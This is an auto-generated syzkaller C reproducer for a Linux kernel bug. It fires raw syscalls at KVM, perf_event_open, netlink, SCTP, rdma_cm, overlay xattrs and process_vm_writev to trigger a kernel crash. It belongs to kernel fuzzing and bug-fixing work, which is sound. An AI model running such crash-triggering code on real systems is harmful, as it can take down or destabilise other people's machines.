// https://syzkaller.appspot.com/bug?id=90cd06695bd4650a5228385b4b02f370ef9c219f
// autogenerated by syzkaller (https://github.com/google/syzkaller)

#define _GNU_SOURCE

#include <endian.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

#define BITMASK_LEN(type, bf_len) (type)((1ull << (bf_len)) - 1)

#define BITMASK_LEN_OFF(type, bf_off, bf_len)                                  \
  (type)(BITMASK_LEN(type, (bf_len)) << (bf_off))

#define STORE_BY_BITMASK(type, addr, val, bf_off, bf_len)                      \
  if ((bf_off) == 0 && (bf_len) == 0) {                                        \
    *(type*)(addr) = (type)(val);                                              \
  } else {                                                                     \
    type new_val = *(type*)(addr);                                             \
    new_val &= ~BITMASK_LEN_OFF(type, (bf_off), (bf_len));                     \
    new_val |= ((type)(val)&BITMASK_LEN(type, (bf_len))) << (bf_off);          \
    *(type*)(addr) = new_val;                                                  \
  }

static long syz_open_dev(long a0, long a1, long a2)
{
  if (a0 == 0xc || a0 == 0xb) {
    char buf[128];
    sprintf(buf, "/dev/%s/%d:%d", a0 == 0xc ? "char" : "block", (uint8_t)a1,
            (uint8_t)a2);
    return open(buf, O_RDWR, 0);
  } else {
    char buf[1024];
    char* hash;
    strncpy(buf, (char*)a0, sizeof(buf) - 1);
    buf[sizeof(buf) - 1] = 0;
    while ((hash = strchr(buf, '#'))) {
      *hash = '0' + (char)(a1 % 10);
      a1 /= 10;
    }
    return open(buf, a2, 0);
  }
}

uint64_t r[8] = {0xffffffffffffffff,
                 0xffffffffffffffff,
                 0xffffffffffffffff,
                 0xffffffffffffffff,
                 0xffffffffffffffff,
                 0x0,
                 0x0,
                 0xffffffffffffffff};

int main(void)
{
  syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
  long res = 0;
  memcpy((void*)0x20000080, "/dev/kvm", 9);
  res = syscall(__NR_openat, 0xffffffffffffff9c, 0x20000080, 0, 0);
  if (res != -1)
    r[0] = res;
  res = syscall(__NR_ioctl, r[0], 0xae01, 0);
  if (res != -1)
    r[1] = res;
  res = syscall(__NR_ioctl, r[1], 0xae41, 0);
  if (res != -1)
    r[2] = res;
  syscall(__NR_ioctl, r[2], 0xc080aebe, 0x20000100);
  syscall(__NR_clone, 0x802102001ffc, 0, 0x9999999999999999, 0x20000040, -1);
  *(uint32_t*)0x200000c0 = 0xfffffffe;
  syscall(__NR_sched_setscheduler, 0, 5, 0x200000c0);
  syscall(__NR_prctl, 0xb, 0x20000080);
  res = syscall(__NR_socket, 0x10, 3, 0x10);
  if (res != -1)
    r[3] = res;
  *(uint64_t*)0x20000100 = 0x20000040;
  *(uint16_t*)0x20000040 = 0x10;
  *(uint16_t*)0x20000042 = 0xfff0;
  *(uint32_t*)0x20000044 = 0;
  *(uint32_t*)0x20000048 = 0;
  *(uint32_t*)0x20000108 = 0xc;
  *(uint64_t*)0x20000110 = 0x200000c0;
  *(uint64_t*)0x200000c0 = 0x20000080;
  *(uint32_t*)0x20000080 = 0x14;
  *(uint16_t*)0x20000084 = 0x28;
  *(uint16_t*)0x20000086 = 0xb01;
  *(uint32_t*)0x20000088 = 0;
  *(uint32_t*)0x2000008c = 0;
  *(uint8_t*)0x20000090 = 6;
  *(uint8_t*)0x20000091 = 0;
  *(uint16_t*)0x20000092 = 0;
  *(uint64_t*)0x200000c8 = 0x165;
  *(uint64_t*)0x20000118 = 1;
  *(uint64_t*)0x20000120 = 0;
  *(uint64_t*)0x20000128 = 0;
  *(uint32_t*)0x20000130 = 0;
  syscall(__NR_sendmsg, r[3], 0x20000100, 0);
  *(uint32_t*)0x20000140 = 0x52;
  *(uint8_t*)0x20000144 = 0x7d;
  *(uint16_t*)0x20000145 = 1;
  *(uint16_t*)0x20000147 = 0;
  *(uint16_t*)0x20000149 = 0x4b;
  *(uint16_t*)0x2000014b = 0xfff9;
  *(uint32_t*)0x2000014d = 3;
  *(uint8_t*)0x20000151 = 0;
  *(uint32_t*)0x20000152 = 1;
  *(uint64_t*)0x20000156 = 1;
  *(uint32_t*)0x2000015e = 0x1000000;
  *(uint32_t*)0x20000162 = 3;
  *(uint32_t*)0x20000166 = 8;
  *(uint64_t*)0x2000016a = 7;
  *(uint16_t*)0x20000172 = 8;
  memcpy((void*)0x20000174, "+ppp1+%{", 8);
  *(uint16_t*)0x2000017c = 0xd;
  memcpy((void*)0x2000017e, "nodeveth0em0)", 13);
  *(uint16_t*)0x2000018b = 0;
  *(uint16_t*)0x2000018d = 3;
  memcpy((void*)0x2000018f, "lo/", 3);
  syscall(__NR_write, -1, 0x20000140, 0x52);
  *(uint32_t*)0x2001d000 = 1;
  *(uint32_t*)0x2001d004 = 0x70;
  *(uint8_t*)0x2001d008 = 0;
  *(uint8_t*)0x2001d009 = 0;
  *(uint8_t*)0x2001d00a = 0x7c;
  *(uint8_t*)0x2001d00b = 0;
  *(uint32_t*)0x2001d00c = 0;
  *(uint64_t*)0x2001d010 = 0x7f;
  *(uint64_t*)0x2001d018 = 0;
  *(uint64_t*)0x2001d020 = 0;
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 0, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 1, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 2, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 3, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 4, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 3, 5, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 6, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 7, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 8, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 9, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0x1f, 10, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 11, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 12, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 13, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 14, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 15, 2);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 17, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 18, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 19, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 20, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 21, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 22, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 23, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 24, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 25, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 26, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 27, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 28, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 29, 35);
  *(uint32_t*)0x2001d030 = 0;
  *(uint32_t*)0x2001d034 = 0;
  *(uint64_t*)0x2001d038 = 0;
  *(uint64_t*)0x2001d040 = 0;
  *(uint64_t*)0x2001d048 = 0;
  *(uint64_t*)0x2001d050 = 0;
  *(uint32_t*)0x2001d058 = 0;
  *(uint32_t*)0x2001d05c = 0;
  *(uint64_t*)0x2001d060 = 0;
  *(uint32_t*)0x2001d068 = 0;
  *(uint16_t*)0x2001d06c = 0;
  *(uint16_t*)0x2001d06e = 0;
  syscall(__NR_perf_event_open, 0x2001d000, 0, 0, -1, 0);
  memcpy((void*)0x20000080, "/dev/kvm", 9);
  syscall(__NR_openat, 0xffffffffffffff9c, 0x20000080, 0, 0);
  syscall(__NR_ioctl, -1, 0xae41, 0);
  res = syscall(__NR_socket, 3, 0x7fe, 0);
  if (res != -1)
    r[4] = res;
  syscall(__NR_getsockopt, r[4], 1, 0x19, 0x20000080, 0x10);
  memcpy((void*)0x200003c0, "./file0", 8);
  syscall(__NR_stat, 0x200003c0, 0x20000400);
  syscall(__NR_ioctl, -1, 0xae41, 3);
  memcpy((void*)0x200015c0,
         "\x76\x65\x74\x68\x31\x00\x00\x00\x00\xff\xff\xff\xff\xff\xef\x00",
         16);
  syscall(__NR_setsockopt, -1, 1, 0x19, 0x200015c0, 0xb);
  syscall(__NR_dup2, -1, -1);
  memcpy((void*)0x20000040,
         "\x76\x65\x74\x68\x31\x5f\x74\x6f\x5f\x62\x6f\x6e\x64\x00\x00\x00",
         16);
  syscall(__NR_setsockopt, -1, 1, 0x19, 0x20000040, 0x10);
  *(uint16_t*)0x20000000 = 2;
  *(uint16_t*)0x20000002 = htobe16(0);
  *(uint32_t*)0x20000004 = htobe32(0);
  *(uint8_t*)0x20000008 = 0;
  *(uint8_t*)0x20000009 = 0xe8;
  *(uint8_t*)0x2000000a = 0;
  *(uint8_t*)0x2000000b = 0;
  *(uint8_t*)0x2000000c = 0;
  *(uint8_t*)0x2000000d = 0;
  *(uint8_t*)0x2000000e = 0;
  *(uint8_t*)0x2000000f = 0;
  syscall(__NR_sendto, -1, 0x20000000, 0xfffffffffffffe4e, 0xc0, 0x20000000, 0);
  memcpy((void*)0x20000000, "/dev/dsp#", 10);
  syz_open_dev(0x20000000, 7, 0x4080);
  *(uint64_t*)0x20039ff8 = 0xfffffffffffffffa;
  syscall(__NR_rt_sigprocmask, 0, 0x20039ff8, 0, 8);
  *(uint32_t*)0x20000100 = 8;
  syscall(__NR_getsockopt, -1, 0x84, 2, 0x200000c0, 0x20000100);
  *(uint32_t*)0x2001d000 = 1;
  *(uint32_t*)0x2001d004 = 0x70;
  *(uint8_t*)0x2001d008 = 0;
  *(uint8_t*)0x2001d009 = 0;
  *(uint8_t*)0x2001d00a = 0;
  *(uint8_t*)0x2001d00b = 0;
  *(uint32_t*)0x2001d00c = 0;
  *(uint64_t*)0x2001d010 = 0x7f;
  *(uint64_t*)0x2001d018 = 0;
  *(uint64_t*)0x2001d020 = 0;
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 0, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 1, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 2, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 3, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 4, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0x81, 5, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 6, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 7, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 8, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 9, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 10, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 11, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 12, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 13, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 14, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 15, 2);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 17, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 18, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 19, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 20, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 21, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 22, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 23, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 24, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 25, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 26, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 27, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 28, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 29, 35);
  *(uint32_t*)0x2001d030 = 0;
  *(uint32_t*)0x2001d034 = 0;
  *(uint64_t*)0x2001d038 = 0x20abe000;
  *(uint64_t*)0x2001d040 = 0;
  *(uint64_t*)0x2001d048 = 0;
  *(uint64_t*)0x2001d050 = 0;
  *(uint32_t*)0x2001d058 = 0;
  *(uint32_t*)0x2001d05c = 0;
  *(uint64_t*)0x2001d060 = 0;
  *(uint32_t*)0x2001d068 = 0;
  *(uint16_t*)0x2001d06c = 0;
  *(uint16_t*)0x2001d06e = 0;
  syscall(__NR_perf_event_open, 0x2001d000, 0, -1, -1, 0);
  *(uint32_t*)0x200001c0 = 0;
  *(uint32_t*)0x200001c4 = 0x64;
  *(uint64_t*)0x200001c8 = 0x20000140;
  *(uint16_t*)0x20000140 = 0xa;
  *(uint16_t*)0x20000142 = htobe16(0x4e24);
  *(uint32_t*)0x20000144 = 0xffffff00;
  *(uint8_t*)0x20000148 = 0xfe;
  *(uint8_t*)0x20000149 = 0x80;
  *(uint8_t*)0x2000014a = 0;
  *(uint8_t*)0x2000014b = 0;
  *(uint8_t*)0x2000014c = 0;
  *(uint8_t*)0x2000014d = 0;
  *(uint8_t*)0x2000014e = 0;
  *(uint8_t*)0x2000014f = 0;
  *(uint8_t*)0x20000150 = 0;
  *(uint8_t*)0x20000151 = 0;
  *(uint8_t*)0x20000152 = 0;
  *(uint8_t*)0x20000153 = 0;
  *(uint8_t*)0x20000154 = 0;
  *(uint8_t*)0x20000155 = 0;
  *(uint8_t*)0x20000156 = 0;
  *(uint8_t*)0x20000157 = 0x1b;
  *(uint32_t*)0x20000158 = 6;
  *(uint16_t*)0x2000015c = 2;
  *(uint16_t*)0x2000015e = htobe16(0x4e21);
  *(uint32_t*)0x20000160 = htobe32(-1);
  *(uint8_t*)0x20000164 = 0;
  *(uint8_t*)0x20000165 = 0;
  *(uint8_t*)0x20000166 = 0;
  *(uint8_t*)0x20000167 = 0;
  *(uint8_t*)0x20000168 = 0;
  *(uint8_t*)0x20000169 = 0;
  *(uint8_t*)0x2000016a = 0;
  *(uint8_t*)0x2000016b = 0;
  *(uint16_t*)0x2000016c = 0xa;
  *(uint16_t*)0x2000016e = htobe16(0x4e22);
  *(uint32_t*)0x20000170 = 0xfffffe00;
  *(uint8_t*)0x20000174 = 0xfe;
  *(uint8_t*)0x20000175 = 0x80;
  *(uint8_t*)0x20000176 = 0;
  *(uint8_t*)0x20000177 = 0;
  *(uint8_t*)0x20000178 = 0;
  *(uint8_t*)0x20000179 = 0;
  *(uint8_t*)0x2000017a = 0;
  *(uint8_t*)0x2000017b = 0;
  *(uint8_t*)0x2000017c = 0;
  *(uint8_t*)0x2000017d = 0;
  *(uint8_t*)0x2000017e = 0;
  *(uint8_t*)0x2000017f = 0;
  *(uint8_t*)0x20000180 = 0;
  *(uint8_t*)0x20000181 = 0;
  *(uint8_t*)0x20000182 = 0;
  *(uint8_t*)0x20000183 = 0x1f;
  *(uint32_t*)0x20000184 = 0x20;
  *(uint16_t*)0x20000188 = 0xa;
  *(uint16_t*)0x2000018a = htobe16(0x4e24);
  *(uint32_t*)0x2000018c = 6;
  *(uint8_t*)0x20000190 = -1;
  *(uint8_t*)0x20000191 = 1;
  *(uint8_t*)0x20000192 = 0;
  *(uint8_t*)0x20000193 = 0;
  *(uint8_t*)0x20000194 = 0;
  *(uint8_t*)0x20000195 = 0;
  *(uint8_t*)0x20000196 = 0;
  *(uint8_t*)0x20000197 = 0;
  *(uint8_t*)0x20000198 = 0;
  *(uint8_t*)0x20000199 = 0;
  *(uint8_t*)0x2000019a = 0;
  *(uint8_t*)0x2000019b = 0;
  *(uint8_t*)0x2000019c = 0;
  *(uint8_t*)0x2000019d = 0;
  *(uint8_t*)0x2000019e = 0;
  *(uint8_t*)0x2000019f = 1;
  *(uint32_t*)0x200001a0 = 6;
  *(uint32_t*)0x20000200 = 0x10;
  res = syscall(__NR_getsockopt, -1, 0x84, 0x6f, 0x200001c0, 0x20000200);
  if (res != -1)
    r[5] = *(uint32_t*)0x200001c0;
  *(uint16_t*)0x20000240 = 0;
  *(uint16_t*)0x20000242 = 1;
  *(uint32_t*)0x20000244 = 7;
  *(uint32_t*)0x20000248 = 7;
  *(uint32_t*)0x2000024c = r[5];
  syscall(__NR_setsockopt, -1, 0x84, 0x22, 0x20000240, 0x10);
  syscall(__NR_socket, 0x10, 3, 0x10);
  memcpy((void*)0x20000000, "./file0", 8);
  memcpy((void*)0x20000100, "trusted.overlay.opaque", 23);
  memcpy((void*)0x20000140, "y", 2);
  syscall(__NR_setxattr, 0x20000000, 0x20000100, 0x20000140, 0xffffffffffffffe7,
          0x400000000000003);
  *(uint32_t*)0x20000200 = 0;
  *(uint32_t*)0x20000204 = 0;
  *(uint32_t*)0x20000208 = 0xfffffffc;
  *(uint32_t*)0x2000020c = 0;
  *(uint32_t*)0x20000210 = 0;
  *(uint32_t*)0x20000214 = 2;
  syscall(__NR_clone, 0x802102001ffc, 0, 0x9999999999999999, 0x20000040, -1);
  res = syscall(__NR_getpid);
  if (res != -1)
    r[6] = res;
  syscall(__NR_getgid);
  *(uint64_t*)0x20000080 = 0x20000240;
  *(uint64_t*)0x20000088 = 0x1000;
  *(uint64_t*)0x200001c0 = 0x200000c0;
  *(uint64_t*)0x200001c8 = 0x85;
  *(uint64_t*)0x200001d0 = 0x20001240;
  *(uint64_t*)0x200001d8 = 0xc2;
  *(uint64_t*)0x200001e0 = 0x20000180;
  *(uint64_t*)0x200001e8 = 0x3b;
  syscall(__NR_process_vm_writev, r[6], 0x20000080, 1, 0x200001c0, 3, 0);
  memcpy((void*)0x20001500, "/dev/infiniband/rdma_cm", 24);
  syscall(__NR_openat, 0xffffffffffffff9c, 0x20001500, 2, 0);
  *(uint32_t*)0x20001400 = 0;
  *(uint16_t*)0x20001404 = 0x18;
  *(uint16_t*)0x20001406 = 0xfa00;
  *(uint64_t*)0x20001408 = 4;
  *(uint64_t*)0x20001410 = 0x200013c0;
  *(uint16_t*)0x20001418 = 0x13f;
  *(uint8_t*)0x2000141a = 5;
  *(uint8_t*)0x2000141b = 0;
  *(uint8_t*)0x2000141c = 0;
  *(uint8_t*)0x2000141d = 0;
  *(uint8_t*)0x2000141e = 0;
  *(uint8_t*)0x2000141f = 0;
  res = syscall(__NR_write, 0xffffff9c, 0x20001400, 0x20);
  if (res != -1)
    r[7] = *(uint32_t*)0x200013c0;
  *(uint32_t*)0x20001440 = 0x16;
  *(uint16_t*)0x20001444 = 0x98;
  *(uint16_t*)0x20001446 = 0xfa00;
  *(uint64_t*)0x20001448 = 0x20001380;
  *(uint64_t*)0x20001450 = 2;
  *(uint32_t*)0x20001458 = r[7];
  *(uint16_t*)0x2000145c = 0x1c;
  *(uint16_t*)0x2000145e = 1;
  *(uint16_t*)0x20001460 = 2;
  *(uint16_t*)0x20001462 = htobe16(0x4e22);
  *(uint32_t*)0x20001464 = htobe32(0);
  *(uint8_t*)0x20001468 = 0;
  *(uint8_t*)0x20001469 = 0;
  *(uint8_t*)0x2000146a = 0;
  *(uint8_t*)0x2000146b = 0;
  *(uint8_t*)0x2000146c = 0;
  *(uint8_t*)0x2000146d = 0;
  *(uint8_t*)0x2000146e = 0;
  *(uint8_t*)0x2000146f = 0;
  syscall(__NR_write, -1, 0x20001440, 0xa0);
  *(uint32_t*)0x2001d000 = 1;
  *(uint32_t*)0x2001d004 = 0x70;
  *(uint8_t*)0x2001d008 = 0;
  *(uint8_t*)0x2001d009 = 0;
  *(uint8_t*)0x2001d00a = 0xf5;
  *(uint8_t*)0x2001d00b = 0;
  *(uint32_t*)0x2001d00c = 0;
  *(uint64_t*)0x2001d010 = 0x7f;
  *(uint64_t*)0x2001d018 = 0;
  *(uint64_t*)0x2001d020 = 0;
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 0, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 1, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 2, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 3, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 4, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 3, 5, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 6, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 7, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 8, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 9, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0x1f, 10, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 11, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 12, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 13, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 14, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 15, 2);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 17, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 18, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 19, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 20, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 21, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 22, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 23, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 24, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 25, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 26, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 27, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 28, 1);
  STORE_BY_BITMASK(uint64_t, 0x2001d028, 0, 29, 35);
  *(uint32_t*)0x2001d030 = 0;
  *(uint32_t*)0x2001d034 = 0;
  *(uint64_t*)0x2001d038 = 0;
  *(uint64_t*)0x2001d040 = 0;
  *(uint64_t*)0x2001d048 = 0;
  *(uint64_t*)0x2001d050 = 0;
  *(uint32_t*)0x2001d058 = 0;
  *(uint32_t*)0x2001d05c = 0;
  *(uint64_t*)0x2001d060 = 0;
  *(uint32_t*)0x2001d068 = 0;
  *(uint16_t*)0x2001d06c = 0;
  *(uint16_t*)0x2001d06e = 0;
  syscall(__NR_perf_event_open, 0x2001d000, 0, 0, -1, 0);
  *(uint32_t*)0x20000300 = 0xc;
  syscall(__NR_getsockopt, -1, 1, 0x11, 0x20000240, 0x20000300);
  memcpy((void*)0x200003c0, "./file0", 8);
  syscall(__NR_stat, 0x200003c0, 0x20000400);
  memcpy((void*)0x20000100, "/dev/midi#", 11);
  syz_open_dev(0x20000100, 6, 0x200);
  *(uint16_t*)0x20e68000 = 2;
  *(uint16_t*)0x20e68002 = htobe16(0x4e23);
  *(uint8_t*)0x20e68004 = 0xac;
  *(uint8_t*)0x20e68005 = 0x14;
  *(uint8_t*)0x20e68006 = 0x14;
  *(uint8_t*)0x20e68007 = 0x1e;
  *(uint8_t*)0x20e68008 = 0;
  *(uint8_t*)0x20e68009 = 0;
  *(uint8_t*)0x20e6800a = 0;
  *(uint8_t*)0x20e6800b = 0;
  *(uint8_t*)0x20e6800c = 0;
  *(uint8_t*)0x20e6800d = 0;
  *(uint8_t*)0x20e6800e = 0;
  *(uint8_t*)0x20e6800f = 0;
  syscall(__NR_sendto, -1, 0x20000000, 0xffffffffffffff5c, 0x200007fe,
          0x20e68000, 0x10);
  memcpy((void*)0x200015c0,
         "\x76\x65\x74\x68\x31\x00\x00\x00\x00\xff\xff\xff\xff\xff\xef\x00",
         16);
  syscall(__NR_setsockopt, -1, 1, 0x19, 0x200015c0, 0xb);
  syscall(__NR_dup2, -1, -1);
  *(uint64_t*)0x20000040 = 0x77359400;
  *(uint64_t*)0x20000048 = 0;
  *(uint64_t*)0x20000050 = 0;
  *(uint64_t*)0x20000058 = 0xe4c;
  syscall(__NR_timer_settime, 0, 0, 0x20000040, 0x20040000);
  return 0;
}